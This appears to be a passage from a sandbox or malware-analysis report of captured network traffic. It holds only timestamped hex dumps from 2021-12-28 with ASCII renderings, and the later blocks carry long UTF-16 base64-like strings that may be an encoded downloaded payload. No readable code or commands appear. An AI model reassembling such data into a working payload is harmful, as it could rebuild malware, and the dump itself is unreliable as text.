9d 6b b0 5e 22 94 3a bb b1 67 16 44 43 7c 6a d9 ee 95 bd d8 e7 d6 23 25 e4 b1 2f 86 89 ee da d3 33 07 49 9d 8c 83 52 22 6d 5a 9b 50 d8 82 8b 2c ba 14 60 2a 5e 11 09 63 81 cf 32 f4 7a
                                                                                                                                                        Data Ascii: !k0m[E:r5L3&pU93vzNWt?\gAm"uN\{g@\!0ZuP:5Hf0)J}o2S}3aC{Z8(~A0I.7I<=G4fLk^":gDC|j#%/3IR"mZP,`*^c2z
                                                                                                                                                        2021-12-28 02:23:24 UTC201INData Raw: 77 4c c2 28 6d a5 f1 6a 7f 1e 2f 45 94 ba 8d 67 91 07 3a e2 07 d2 a6 3d 8e 51 da 4e 6b b5 ee 91 b7 fc 54 b5 19 fd 05 88 27 cb 46 bf 0d e8 6b a7 15 57 bf 14 cd 80 f7 5f 82 00 7e 92 06 72 0f ca b3 12 7f 9f ee e4 09 81 9f fe 4b 79 e6 c4 c4 52 51 56 56 16 72 cc ac c3 3e bf e1 61 41 9e cd 6b 37 33 73 01 f5 1d 9c ce 66 6d 0b 05 50 76 1e d2 1f 70 2b 24 40 51 35 33 de 45 7b 7b 01 c8 d5 e0 d6 68 54 3b 59 87 33 50 65 38 10 9f 87 a4 cb 94 80 09 07 68 1d 7d 0c f2 22 96 34 7c 30 94 f4 cd 45 d4 c8 25 88 29 60 d8 84 9d a1 0e d2 8b e3 ca 93 d3 16 29 a7 7d 3e 58 8e 65 e6 f7 0b a3 66 48 f0 47 52 50 11 b3 ee 05 2b a7 fe 0b f2 d6 89 43 ce 2f e0 6b 01 cf 3f 59 d1 3f a8 eb 82 cf 7b 7e 76 d6 70 f7 53 93 2d 03 0c 9f 50 4e e4 8d c2 44 76 e9 ab 94 09 5b 24 4c 11 e9 2e 0b 59 e1 10
                                                                                                                                                        Data Ascii: wL(mj/Eg:=QNkT'FkW_~rKyRQVVr>aAk73sfmPvp+$@Q53E{{hT;Y3Pe8h}"4|0E%)`)}>XefHGRP+C/k?Y?{~vpS-PNDv[$L.Y
                                                                                                                                                        2021-12-28 02:23:24 UTC206INData Raw: 0d 0d d5 af 78 90 ba 02 fc e4 92 a4 69 3c e2 37 68 99 8d 7f 3e 5b d0 3b d3 9d 94 87 a4 f0 45 86 f3 6a e9 d6 53 c0 ca 70 79 c0 ff a9 3b 5e 96 7c 6d 1b f2 98 54 ef 08 22 30 4a e3 97 c9 dc 71 38 6d 41 2c cc ab 3f 2a 46 45 70 61 b4 c7 c3 3d 90 9a c8 e3 04 7c 8b 3f ac e7 d1 a2 65 ec 19 f8 f5 c3 9d 29 07 a9 df ea c6 8c a5 d6 4f 78 74 6d eb 7b cb b5 c0 bc 7e 47 c7 50 5e 3d 09 d0 2a e2 55 b6 0d f0 83 12 a6 fc 74 e5 78 c4 87 b1 61 d7 a9 9a a7 89 02 6f 81 42 d0 5f 79 8e d4 6f 14 5c e2 93 6f aa db d7 7a 00 d6 8f f5 41 c3 e7 e3 4f 4c 3f e2 9c cf 0e 11 bc 0d 80 5f ce a2 cb fe 18 7e 9c bd 1e b3 d5 09 b4 0c 4a 74 66 fa c9 f7 b2 73 41 c1 26 12 78 72 53 ab 68 6a 60 c4 b3 e9 f7 57 1b c2 0d 33 97 1f eb a0 81 47 7d 23 fc a5 6a 8b 35 5e e4 61 c5 a2 40 e8 c3 4d bc b0 9b 1f fa
                                                                                                                                                        Data Ascii: xi<7h>[;EjSpy;^|mT"0Jq8mA,?*FEpa=|?e)Oxtm{~GP^=*UtxaoB_yo\ozAOL?_~JtfsA&xrShj`W3G}#j5^a@M
                                                                                                                                                        2021-12-28 02:23:24 UTC210INData Raw: 9a c3 eb 85 c5 73 34 04 17 d6 5c 9f 8d ba b6 20 66 d6 86 e4 a3 22 50 0b a7 41 81 25 f9 8f 21 b3 8b 25 50 33 ce c1 36 a7 66 ea 7a 36 b9 87 aa 21 a6 3f 27 10 6c cc 0f c5 21 48 91 a7 45 71 bc 57 8f 89 8f 79 fc d6 30 b0 1e cb a9 22 62 8c 74 9f a6 f3 8d 84 48 1e 5b fa 6d d5 93 47 10 02 f6 d1 8d 01 ab 1b a9 e6 e7 42 73 93 a1 2b 7e 76 41 8c fc 0e 16 17 7b 79 5d 4d a1 cc a4 b7 90 da fc 58 ce 33 ea 12 01 a2 c7 65 a3 04 41 5d 7f aa b7 b1 ed 4a 4e c3 df be ed 77 83 eb cd 69 e3 78 e7 71 01 a2 08 05 c6 3d 83 0c 82 b4 f2 d0 bc 72 3a 4f b5 de c2 8e 93 3b 00 7e 05 d4 73 21 83 87 88 a3 10 6b dc 8d cd b6 66 00 cd aa e5 8e 32 ac de 1a 93 e8 8a 9a c6 34 1d d1 23 1d 49 a8 fd 46 3c 1b f5 02 6d f4 7a d7 5e 76 bd 30 3c 30 0f 8e c7 c6 6e 3f be cb 6c ed f7 03 34 56 e7 a6 5b 4e d5
                                                                                                                                                        Data Ascii: s4\ f"PA%!%P36fz6!?'l!HEqWy0"btH[mGBs+~vA{y]MX3eA]JNwixq=r:O;~s!kf24#IF<mz^v0<0n?l4V[N
                                                                                                                                                        2021-12-28 02:23:24 UTC214INData Raw: 18 2e 9c e5 51 53 d0 86 91 4d e7 c0 64 b9 55 f9 27 33 16 9a ca c3 f3 ad 22 56 6d b8 93 29 29 47 14 04 6b 71 5f 64 c1 27 66 a6 b2 af ac e9 61 1a 7b 05 85 d9 aa 1b 64 07 d6 da b6 65 6d bb f7 49 a5 30 32 0d 9b 77 70 d9 2e dc e6 1b 25 e1 12 ab 9d 67 ff 52 18 e2 69 22 c3 f2 e5 48 bf e8 98 e8 16 7c e7 75 19 fe fc 1c 49 01 27 b0 4f 3a 3c b8 ee b4 f9 dd 47 1f 6c 11 61 2a e3 72 b3 17 48 89 31 01 2e 19 ea ba 01 70 f5 db 2d fe bf 7a 68 08 4b 28 37 51 e5 c2 3e 74 e7 d0 4c 2e e7 73 78 5f 80 2e dd 74 ec 6d 74 da 7f 00 c5 e8 6e 03 2e 15 fb 36 68 bf d7 8d db dd 19 69 57 2d 53 29 00 f4 c7 33 be 4a e3 e5 07 f4 18 19 ef 26 e1 4a 20 0e 1d 78 92 40 e7 a8 76 84 ce 02 a4 79 b8 7d d9 71 dd 31 90 5f 52 d8 f9 81 82 95 82 4a 86 2a b6 53 64 cd f8 e5 a4 d2 8e 5c 45 bd 01 59 a5 76 fb
                                                                                                                                                        Data Ascii: .QSMdU'3"Vm))Gkq_d'fa{demI02wp.%gRi"H|uI'O:<Gla*rH1.p-zhK(7Q>tL.sx_.tmtn.6hiW-S)3J&J x@vy}q1_RJ*Sd\EYv
                                                                                                                                                        2021-12-28 02:23:24 UTC225INData Raw: cf 42 bd 27 4f dc 7b 89 57 10 e4 38 e3 e1 17 a2 d5 0d f6 5d bc 0b 65 2d bb 3e 8f 41 98 64 30 f4 c3 aa 2f e4 3d ba d7 a8 23 db 6b ea 8e 38 c2 b8 2f 46 b1 fe c1 28 ad 7e bb 8a 98 ac d2 55 06 de 8d 7b 99 c2 de b3 d0 2e b1 75 49 12 37 4d d0 95 c1 de ca a5 42 6c 60 27 8b 47 e6 f2 c0 07 9f 17 06 fb 51 ff 75 59 02 7e a1 51 c1 79 39 38 45 b7 33 0f d2 22 eb ed 30 19 2c 65 76 54 50 84 64 be 3d 28 d8 5a 25 3c 71 d4 54 47 de b7 6f 23 86 9a 81 ae 33 fa 95 33 02 b3 7f c0 b4 a0 5f 82 8d 90 8f 5d a6 47 2d 41 57 f1 21 ff 2b 3e 27 55 9a 8c f2 54 0a 64 aa e3 2c 32 15 39 4b 8c ca b9 ec 34 8d e6 13 96 56 5c 6d 72 bd fa a4 b8 74 4e a0 ef 8c 1c a0 15 6b ba 51 a5 e0 fd 01 f7 cc 16 08 9a d0 75 c4 db df 7b d0 7a cc 1e ac 9e a1 da 73 af c4 72 1d d4 65 74 50 49 c1 3c f7 5e 2e da 90
                                                                                                                                                        Data Ascii: B'O{W8]e->Ad0/=#k8/F(~U{.uI7MBl`'GQuY~Qy98E3"0,evTPd=(Z%<qTGo#33_]G-AW!+>'UTd,29K4V\mrtNkQu{zsretPI<^.
                                                                                                                                                        2021-12-28 02:23:24 UTC241INData Raw: 82 80 60 35 01 02 98 82 80 60 41 ba 82 80 60 35 02 22 02 41 a5 82 80 a0 01 49 88 81 80 40 89 bb 81 80 a0 01 89 a6 82 80 a0 01 35 03 22 03 14 90 01 22 03 21 14 90 01 22 02 4d 01 22 03 4d 00 40 72 22 02 4d 03 22 03 4d 01 40 72 22 02 4d 05 22 03 4d 02 40 72 22 02 4d 07 22 03 4d 03 40 72 22 02 4d 09 22 03 4d 04 40 72 22 02 4d 0b 22 03 4d 05 40 72 22 02 4d 0d 22 03 4d 06 40 72 22 02 4d 0f 22 03 4d 07 40 72 4d 00 35 04 83 a2 01 22 01 22 04 22 01 22 04 40 22 02 22 04 40 ad 88 72 22 04 4d 01 67 35 04 22 04 22 02 21 50 6d 93 01 1e 01 4d 40 95 89 02 41 9a 82 80 60 9f 4d 01 89 aa 82 80 a0 01 22 01 22 02 89 ab 82 80 a0 01 35 05 41 b5 82 80 60 35 06 22 06 22 05 4d 01 02 a2 80 80 a0 01 9f 22 00 4d 00 22 00 21 50 89 8a 82 80 a0 01 9f 89 ac 82 80 a0 01 22 06 41 b6 82 80
                                                                                                                                                        Data Ascii: `5`A`5"AI@5""!"M"M@r"M"M@r"M"M@r"M"M@r"M"M@r"M"M@r"M"M@r"M"M@rM5""""@""@r"Mg5""!PmM@A`M""5A`5""M"M"!P"A
                                                                                                                                                        2021-12-28 02:23:24 UTC257INData Raw: 00 33 00 2b 00 52 00 5a 00 4d 00 41 00 65 00 4b 00 37 00 34 00 51 00 51 00 55 00 62 00 4c 00 79 00 43 00 6a 00 41 00 61 00 49 00 30 00 78 00 72 00 6c 00 2f 00 4b 00 5a 00 71 00 6b 00 41 00 73 00 72 00 59 00 58 00 43 00 74 00 73 00 65 00 49 00 38 00 49 00 30 00 49 00 52 00 31 00 68 00 64 00 6e 00 32 00 35 00 56 00 4c 00 65 00 7a 00 6b 00 67 00 4e 00 6d 00 53 00 47 00 46 00 55 00 48 00 46 00 4e 00 47 00 33 00 62 00 77 00 6c 00 39 00 69 00 6d 00 4d 00 52 00 35 00 77 00 63 00 6c 00 77 00 33 00 66 00 45 00 49 00 47 00 54 00 4d 00 63 00 61 00 43 00 62 00 57 00 76 00 61 00 48 00 49 00 45 00 31 00 35 00 76 00 42 00 61 00 67 00 5a 00 39 00 7a 00 75 00 63 00 64 00 2b 00 49 00 41 00 74 00 32 00 51 00 75 00 63 00 62 00 52 00 56 00 57 00 31 00 74 00 38 00 4a 00 67 00
                                                                                                                                                        Data Ascii: 3+RZMAeK74QQUbLyCjAaI0xrl/KZqkAsrYXCtseI8I0IR1hdn25VLezkgNmSGFUHFNG3bwl9imMR5wclw3fEIGTMcaCbWvaHIE15vBagZ9zucd+IAt2QucbRVW1t8Jg
                                                                                                                                                        2021-12-28 02:23:24 UTC273INData Raw: 00 45 00 68 00 4a 00 6b 00 38 00 65 00 53 00 53 00 30 00 38 00 73 00 53 00 79 00 74 00 78 00 57 00 73 00 46 00 45 00 74 00 72 00 44 00 2b 00 56 00 30 00 65 00 57 00 52 00 4e 00 72 00 76 00 6b 00 34 00 33 00 45 00 4f 00 70 00 6e 00 4f 00 4a 00 35 00 2f 00 32 00 72 00 55 00 50 00 64 00 44 00 6d 00 66 00 4f 00 47 00 49 00 5a 00 53 00 71 00 67 00 66 00 6f 00 66 00 70 00 54 00 36 00 48 00 51 00 4c 00 74 00 53 00 37 00 50 00 74 00 66 00 48 00 6f 00 30 00 61 00 52 00 56 00 38 00 4a 00 57 00 4d 00 65 00 4d 00 55 00 43 00 67 00 77 00 30 00 67 00 49 00 66 00 32 00 54 00 46 00 6e 00 30 00 65 00 42 00 65 00 69 00 6b 00 70 00 35 00 4c 00 68 00 5a 00 79 00 66 00 5a 00 45 00 35 00 59 00 6f 00 38 00 76 00 67 00 31 00 37 00 6e 00 73 00 4c 00 35 00 43 00 63 00 79 00 6a 00
                                                                                                                                                        Data Ascii: EhJk8eSS08sSytxWsFEtrD+V0eWRNrvk43EOpnOJ5/2rUPdDmfOGIZSqgfofpT6HQLtS7PtfHo0aRV8JWMeMUCgw0gIf2TFn0eBeikp5LhZyfZE5Yo8vg17nsL5Ccyj
                                                                                                                                                        2021-12-28 02:23:24 UTC289INData Raw: 00 77 00 67 00 75 00 47 00 53 00 58 00 69 00 6c 00 38 00 64 00 75 00 74 00 53 00 48 00 68 00 4d 00 74 00 79 00 38 00 71 00 52 00 6e 00 69 00 63 00 52 00 61 00 37 00 52 00 41 00 4f 00 4f 00 61 00 69 00 54 00 41 00 33 00 64 00 71 00 31 00 52 00 38 00 47 00 4d 00 7a 00 4d 00 78 00 75 00 4e 00 41 00 78 00 34 00 2b 00 6b 00 38 00 51 00 36 00 44 00 43 00 33 00 2b 00 6f 00 6d 00 30 00 45 00 34 00 36 00 68 00 78 00 4b 00 5a 00 6d 00 70 00 56 00 77 00 6a 00 47 00 56 00 32 00 45 00 43 00 36 00 2f 00 51 00 71 00 74 00 44 00 31 00 79 00 38 00 57 00 49 00 72 00 79 00 56 00 4b 00 36 00 65 00 2b 00 77 00 4f 00 4e 00 56 00 4c 00 55 00 63 00 74 00 5a 00 2f 00 4e 00 46 00 66 00 71 00 36 00 2b 00 30 00 71 00 50 00 56 00 74 00 4e 00 6e 00 4a 00 49 00 4a 00 36 00 50 00 45 00
                                                                                                                                                        Data Ascii: wguGSXil8dutSHhMty8qRnicRa7RAOOaiTA3dq1R8GMzMxuNAx4+k8Q6DC3+om0E46hxKZmpVwjGV2EC6/QqtD1y8WIryVK6e+wONVLUctZ/NFfq6+0qPVtNnJIJ6PE
                                                                                                                                                        2021-12-28 02:23:24 UTC305INData Raw: 00 33 00 7a 00 49 00 49 00 38 00 31 00 77 00 72 00 34 00 42 00 41 00 58 00 67 00 48 00 2b 00 4d 00 58 00 77 00 48 00 43 00 44 00 31 00 5a 00 59 00 6f 00 54 00 55 00 65 00 72 00 77 00 57 00 63 00 79 00 33 00 69 00 68 00 33 00 4b 00 61 00 45 00 36 00 6f 00 57 00 35 00 44 00 70 00 62 00 43 00 70 00 65 00 49 00 6c 00 56 00 75 00 79 00 46 00 62 00 46 00 70 00 78 00 37 00 2b 00 44 00 46 00 48 00 7a 00 46 00 48 00 42 00 4f 00 61 00 6c 00 69 00 4f 00 4a 00 4a 00 78 00 35 00 33 00 78 00 68 00 73 00 67 00 6f 00 50 00 67 00 45 00 6c 00 6a 00 31 00 6f 00 53 00 59 00 71 00 52 00 6a 00 76 00 4d 00 50 00 67 00 61 00 4a 00 73 00 4f 00 6a 00 36 00 52 00 70 00 56 00 4a 00 57 00 6b 00 75 00 46 00 46 00 6d 00 78 00 36 00 37 00 66 00 47 00 5a 00 48 00 31 00 4e 00 33 00 42 00
                                                                                                                                                        Data Ascii: 3zII81wr4BAXgH+MXwHCD1ZYoTUerwWcy3ih3KaE6oW5DpbCpeIlVuyFbFpx7+DFHzFHBOaliOJJx53xhsgoPgElj1oSYqRjvMPgaJsOj6RpVJWkuFFmx67fGZH1N3B
                                                                                                                                                        2021-12-28 02:23:24 UTC321INData Raw: 00 69 00 74 00 38 00 2f 00 54 00 37 00 4f 00 4e 00 6e 00 6d 00 4b 00 31 00 45 00 35 00 44 00 51 00 48 00 51 00 44 00 46 00 44 00 43 00 30 00 42 00 69 00 74 00 55 00 2b 00 76 00 47 00 2b 00 56 00 55 00 78 00 33 00 52 00 7a 00 2f 00 56 00 36 00 32 00 79 00 4b 00 76 00 64 00 44 00 63 00 30 00 6f 00 6e 00 69 00 2b 00 43 00 44 00 48 00 57 00 39 00 61 00 68 00 32 00 6e 00 78 00 6c 00 71 00 79 00 6d 00 32 00 38 00 6d 00 36 00 51 00 43 00 6c 00 75 00 56 00 51 00 6b 00 41 00 45 00 6c 00 34 00 4d 00 79 00 75 00 74 00 51 00 73 00 39 00 72 00 7a 00 5a 00 68 00 6c 00 67 00 63 00 48 00 73 00 48 00 6c 00 65 00 72 00 78 00 44 00 35 00 6e 00 2f 00 30 00 44 00 79 00 7a 00 4c 00 53 00 70 00 6f 00 41 00 54 00 7a 00 58 00 76 00 45 00 4e 00 58 00 46 00 6b 00 4d 00 75 00 43 00
                                                                                                                                                        Data Ascii: it8/T7ONnmK1E5DQHQDFDC0BitU+vG+VUx3Rz/V62yKvdDc0oni+CDHW9ah2nxlqym28m6QCluVQkAEl4MyutQs9rzZhlgcHsHlerxD5n/0DyzLSpoATzXvENXFkMuC
                                                                                                                                                        2021-12-28 02:23:24 UTC337INData Raw: 00 4b 00 43 00 32 00 51 00 5a 00 51 00 2f 00 44 00 75 00 5a 00 57 00 44 00 4f 00 32 00 45 00 37 00 79 00 59 00 41 00 39 00 51 00 2b 00 76 00 53 00 45 00 6a 00 57 00 41 00 34 00 48 00 6f 00 74 00 43 00 43 00 56 00 39 00 38 00 53 00 6a 00 4b 00 33 00 55 00 2b 00 71 00 36 00 6f 00 32 00 72 00 50 00 79 00 30 00 45 00 77 00 63 00 48 00 37 00 6f 00 77 00 67 00 2f 00 33 00 35 00 4d 00 2f 00 73 00 41 00 36 00 4a 00 72 00 74 00 4b 00 4a 00 4c 00 71 00 41 00 63 00 49 00 2b 00 4f 00 64 00 47 00 36 00 41 00 51 00 57 00 62 00 4d 00 69 00 6f 00 45 00 76 00 74 00 37 00 75 00 67 00 53 00 42 00 50 00 64 00 79 00 36 00 59 00 65 00 6a 00 51 00 53 00 71 00 46 00 71 00 4c 00 67 00 42 00 54 00 38 00 55 00 56 00 75 00 53 00 5a 00 35 00 69 00 49 00 42 00 6e 00 52 00 50 00 6d 00
                                                                                                                                                        Data Ascii: KC2QZQ/DuZWDO2E7yYA9Q+vSEjWA4HotCCV98SjK3U+q6o2rPy0EwcH7owg/35M/sA6JrtKJLqAcI+OdG6AQWbMioEvt7ugSBPdy6YejQSqFqLgBT8UVuSZ5iIBnRPm
                                                                                                                                                        2021-12-28 02:23:24 UTC353INData Raw: 00 4d 00 4b 00 4c 00 4f 00 58 00 41 00 6f 00 31 00 53 00 62 00 53 00 33 00 78 00 6c 00 71 00 44 00 65 00 61 00 36 00 2f 00 52 00 30 00 33 00 45 00 43 00 73 00 48 00 72 00 53 00 58 00 4c 00 4b 00 56 00 72 00 43 00 57 00 79 00 6b 00 5a 00 66 00 43 00 79 00 53 00 6c 00 35 00 4f 00 6b 00 79 00 78 00 42 00 66 00 51 00 4f 00 79 00 63 00 33 00 67 00 4b 00 47 00 62 00 4a 00 42 00 48 00 2f 00 59 00 6d 00 32 00 2f 00 45 00 30 00 78 00 2f 00 4b 00 32 00 54 00 4a 00 4f 00 45 00 5a 00 61 00 69 00 70 00 78 00 62 00 44 00 77 00 34 00 74 00 6c 00 62 00 75 00 58 00 6c 00 49 00 56 00 6e 00 35 00 74 00 61 00 4a 00 33 00 6e 00 44 00 6e 00 79 00 42 00 70 00 37 00 54 00 4e 00 79 00 51 00 64 00 36 00 7a 00 5a 00 4e 00 4a 00 37 00 41 00 73 00 64 00 77 00 52 00 7a 00 43 00 6c 00
                                                                                                                                                        Data Ascii: MKLOXAo1SbS3xlqDea6/R03ECsHrSXLKVrCWykZfCySl5OkyxBfQOyc3gKGbJBH/Ym2/E0x/K2TJOEZaipxbDw4tlbuXlIVn5taJ3nDnyBp7TNyQd6zZNJ7AsdwRzCl
                                                                                                                                                        2021-12-28 02:23:24 UTC369INData Raw: 00 64 00 63 00 75 00 4c 00 64 00 49 00 59 00 72 00 79 00 44 00 4e 00 2b 00 2f 00 6f 00 6a 00 78 00 6c 00 42 00 61 00 56 00 68 00 46 00 4f 00 57 00 6f 00 76 00 6c 00 56 00 78 00 46 00 48 00 74 00 73 00 55 00 42 00 31 00 56 00 64 00 7a 00 50 00 5a 00 6a 00 65 00 64 00 6d 00 76 00 56 00 59 00 53 00 4b 00 75 00 2f 00 46 00 73 00 36 00 76 00 48 00 70 00 76 00 56 00 53 00 34 00 2b 00 33 00 5a 00 76 00 46 00 71 00 67 00 4a 00 58 00 2f 00 66 00 70 00 4d 00 65 00 30 00 39 00 2b 00 37 00 34 00 61 00 34 00 77 00 57 00 35 00 34 00 7a 00 51 00 4a 00 47 00 46 00 49 00 64 00 51 00 41 00 54 00 32 00 62 00 31 00 7a 00 73 00 4a 00 2b 00 31 00 76 00 6a 00 33 00 47 00 52 00 39 00 74 00 6b 00 50 00 55 00 36 00 6a 00 76 00 72 00 52 00 35 00 69 00 59 00 45 00 36 00 76 00 79 00
                                                                                                                                                        Data Ascii: dcuLdIYryDN+/ojxlBaVhFOWovlVxFHtsUB1VdzPZjedmvVYSKu/Fs6vHpvVS4+3ZvFqgJX/fpMe09+74a4wW54zQJGFIdQAT2b1zsJ+1vj3GR9tkPU6jvrR5iYE6vy
                                                                                                                                                        2021-12-28 02:23:24 UTC385INData Raw: 00 51 00 2b 00 69 00 4c 00 6d 00 71 00 4b 00 48 00 72 00 5a 00 2b 00 67 00 70 00 56 00 46 00 54 00 61 00 73 00 6f 00 30 00 65 00 6e 00 49 00 79 00 2f 00 67 00 45 00 51 00 34 00 4a 00 6d 00 61 00 64 00 4f 00 66 00 6f 00 2b 00 76 00 63 00 76 00 32 00 6c 00 35 00 2b 00 6f 00 6a 00 55 00 6b 00 68 00 39 00 74 00 58 00 76 00 6b 00 2f 00 2f 00 4f 00 31 00 62 00 35 00 5a 00 4a 00 33 00 63 00 4e 00 38 00 30 00 38 00 6d 00 6a 00 4d 00 43 00 78 00 59 00 48 00 50 00 78 00 53 00 41 00 45 00 47 00 76 00 62 00 36 00 35 00 6f 00 4b 00 4f 00 62 00 4e 00 64 00 66 00 42 00 33 00 62 00 2f 00 66 00 30 00 78 00 70 00 63 00 37 00 2b 00 57 00 57 00 6a 00 32 00 48 00 68 00 30 00 2f 00 4f 00 39 00 34 00 7a 00 59 00 75 00 76 00 69 00 57 00 41 00 2b 00 53 00 78 00 75 00 4e 00 57 00
                                                                                                                                                        Data Ascii: Q+iLmqKHrZ+gpVFTaso0enIy/gEQ4JmadOfo+vcv2l5+ojUkh9tXvk//O1b5ZJ3cN808mjMCxYHPxSAEGvb65oKObNdfB3b/f0xpc7+WWj2Hh0/O94zYuviWA+SxuNW
                                                                                                                                                        2021-12-28 02:23:24 UTC396INData Raw: 64 00 63 00 6b 00 57 00 62 00 51 00 49 00 35 00 2b 00 6f 00 63 00 64 00 50 00 73 00 63 00 4d 00 35 00 31 00 39 00 64 00 30 00 34 00 77 00 56 00 65 00 48 00 75 00 54 00 4a 00 77 00 4b 00 75 00 6f 00 77 00 53 00 72 00 4b 00 6d 00 76 00 66 00 69 00 32 00 41 00 69 00 41 00 30 00 37 00 31 00 70 00 52 00 59 00 59 00 39 00 4a 00 34 00 35 00 2f 00 72 00 6c 00 6f 00 73 00 4a 00 77 00 4a 00 6b 00 70 00 4f 00 45 00 73 00 74 00 4f 00 75 00 4b 00 72 00 4e 00 6d 00 34 00 71 00 50 00 6e 00 53 00 32 00 36 00 37 00 54 00 62 00 57 00 52 00 6a 00 49 00 33 00 47 00 7a 00 67 00 49 00 6e 00 79 00 64 00 36 00 68 00 41 00 54 00 69 00 69 00 4d 00 75 00 71 00 71 00 43 00 35 00 36 00 59 00 63 00 41 00 71 00 4c 00 56 00 6b 00 54 00 30 00 35 00 68 00 47 00 69 00 68 00 74 00 2b 00 38
                                                                                                                                                        Data Ascii: dckWbQI5+ocdPscM519d04wVeHuTJwKuowSrKmvfi2AiA071pRYY9J45/rlosJwJkpOEstOuKrNm4qPnS267TbWRjI3GzgInyd6hATiiMuqqC56YcAqLVkT05hGiht+8
                                                                                                                                                        2021-12-28 02:23:24 UTC412INData Raw: 75 00 48 00 71 00 45 00 35 00 56 00 51 00 78 00 50 00 50 00 39 00 38 00 4f 00 45 00 4c 00 35 00 2f 00 67 00 63 00 59 00 62 00 67 00 53 00 2b 00 4d 00 43 00 31 00 67 00 66 00 66 00 70 00 32 00 32 00 6a 00 72 00 44 00 6d 00 45 00 41 00 43 00 67 00 64 00 6f 00 67 00 55 00 61 00 45 00 74 00 48 00 6c 00 51 00 2b 00 6a 00 70 00 37 00 56 00 31 00 75 00 56 00 59 00 4b 00 50 00 2b 00 66 00 79 00 69 00 64 00 69 00 32 00 36 00 41 00 2b 00 55 00 2b 00 76 00 74 00 57 00 6b 00 52 00 55 00 49 00 73 00 54 00 61 00 57 00 7a 00 70 00 37 00 2f 00 71 00 73 00 7a 00 44 00 50 00 6b 00 4d 00 75 00 62 00 4a 00 69 00 2f 00 37 00 50 00 4f 00 51 00 54 00 47 00 54 00 51 00 4c 00 48 00 4c 00 41 00 75 00 46 00 75 00 6d 00 69 00 34 00 32 00 36 00 6f 00 44 00 50 00 31 00 59 00 78 00 4e
                                                                                                                                                        Data Ascii: uHqE5VQxPP98OEL5/gcYbgS+MC1gffp22jrDmEACgdogUaEtHlQ+jp7V1uVYKP+fyidi26A+U+vtWkRUIsTaWzp7/qszDPkMubJi/7POQTGTQLHLAuFumi426oDP1YxN
                                                                                                                                                        2021-12-28 02:23:24 UTC428INData Raw: 71 00 32 00 52 00 7a 00 31 00 6f 00 39 00 36 00 2b 00 48 00 35 00 5a 00 48 00 6b 00 30 00 50 00 6b 00 33 00 45 00 54 00 36 00 62 00 63 00 43 00 55 00 6c 00 62 00 44 00 47 00 72 00 57 00 45 00 42 00 30 00 4c 00 6f 00 68 00 63 00 50 00 4e 00 66 00 49 00 69 00 6b 00 2f 00 58 00 75 00 55 00 44 00 56 00 59 00 62 00 44 00 46 00 78 00 31 00 51 00 48 00 56 00 49 00 59 00 2b 00 71 00 42 00 32 00 30 00 4c 00 6d 00 56 00 58 00 79 00 77 00 4a 00 52 00 74 00 56 00 2b 00 4f 00 6a 00 49 00 34 00 4e 00 6d 00 61 00 68 00 49 00 46 00 4c 00 50 00 61 00 73 00 57 00 37 00 4a 00 57 00 76 00 54 00 4d 00 54 00 66 00 57 00 33 00 69 00 45 00 30 00 79 00 76 00 43 00 38 00 70 00 45 00 46 00 55 00 50 00 79 00 48 00 79 00 69 00 79 00 74 00 61 00 53 00 4f 00 67 00 2f 00 46 00 64 00 69
                                                                                                                                                        Data Ascii: q2Rz1o96+H5ZHk0Pk3ET6bcCUlbDGrWEB0LohcPNfIik/XuUDVYbDFx1QHVIY+qB20LmVXywJRtV+OjI4NmahIFLPasW7JWvTMTfW3iE0yvC8pEFUPyHyiytaSOg/Fdi
                                                                                                                                                        2021-12-28 02:23:24 UTC444INData Raw: 46 00 39 00 69 00 4d 00 4e 00 34 00 77 00 33 00 49 00 4a 00 4d 00 65 00 69 00 41 00 31 00 35 00 34 00 4a 00 63 00 59 00 2f 00 6b 00 4c 00 79 00 57 00 4a 00 53 00 66 00 7a 00 73 00 5a 00 72 00 42 00 42 00 58 00 6d 00 73 00 6f 00 79 00 62 00 33 00 73 00 51 00 30 00 51 00 36 00 76 00 50 00 67 00 42 00 4c 00 59 00 6e 00 57 00 68 00 5a 00 61 00 45 00 48 00 7a 00 73 00 4d 00 53 00 49 00 4b 00 31 00 4d 00 65 00 59 00 54 00 6c 00 66 00 6d 00 36 00 57 00 75 00 53 00 51 00 69 00 73 00 7a 00 6a 00 36 00 67 00 53 00 73 00 50 00 4d 00 74 00 59 00 41 00 32 00 2b 00 6c 00 39 00 50 00 7a 00 75 00 56 00 56 00 75 00 50 00 73 00 52 00 74 00 4c 00 42 00 33 00 7a 00 72 00 4b 00 62 00 54 00 35 00 4f 00 50 00 44 00 69 00 70 00 51 00 66 00 65 00 6d 00 30 00 49 00 6f 00 47 00 77
                                                                                                                                                        Data Ascii: F9iMN4w3IJMeiA154JcY/kLyWJSfzsZrBBXmsoyb3sQ0Q6vPgBLYnWhZaEHzsMSIK1MeYTlfm6WuSQiszj6gSsPMtYA2+l9PzuVVuPsRtLB3zrKbT5OPDipQfem0IoGw
                                                                                                                                                        2021-12-28 02:23:24 UTC460INData Raw: 56 00 4c 00 61 00 37 00 61 00 78 00 38 00 68 00 58 00 62 00 70 00 64 00 6f 00 75 00 50 00 78 00 41 00 31 00 68 00 71 00 54 00 6b 00 73 00 6a 00 38 00 6a 00 55 00 32 00 76 00 35 00 56 00 72 00 65 00 4d 00 69 00 6d 00 67 00 4f 00 69 00 63 00 35 00 30 00 4b 00 76 00 6f 00 51 00 6f 00 4f 00 4c 00 34 00 45 00 78 00 41 00 41 00 4f 00 4e 00 6c 00 46 00 45 00 51 00 75 00 37 00 64 00 63 00 36 00 2f 00 6c 00 4b 00 6a 00 51 00 31 00 4c 00 71 00 54 00 4a 00 51 00 45 00 77 00 75 00 4c 00 56 00 79 00 6f 00 74 00 74 00 4c 00 70 00 30 00 30 00 7a 00 7a 00 45 00 78 00 50 00 71 00 65 00 71 00 66 00 2b 00 66 00 49 00 70 00 31 00 72 00 46 00 56 00 43 00 64 00 33 00 78 00 59 00 6c 00 6f 00 49 00 7a 00 4f 00 67 00 4d 00 75 00 7a 00 72 00 69 00 64 00 48 00 37 00 50 00 31 00 57
                                                                                                                                                        Data Ascii: VLa7ax8hXbpdouPxA1hqTksj8jU2v5VreMimgOic50KvoQoOL4ExAAONlFEQu7dc6/lKjQ1LqTJQEwuLVyottLp00zzExPqeqf+fIp1rFVCd3xYloIzOgMuzridH7P1W
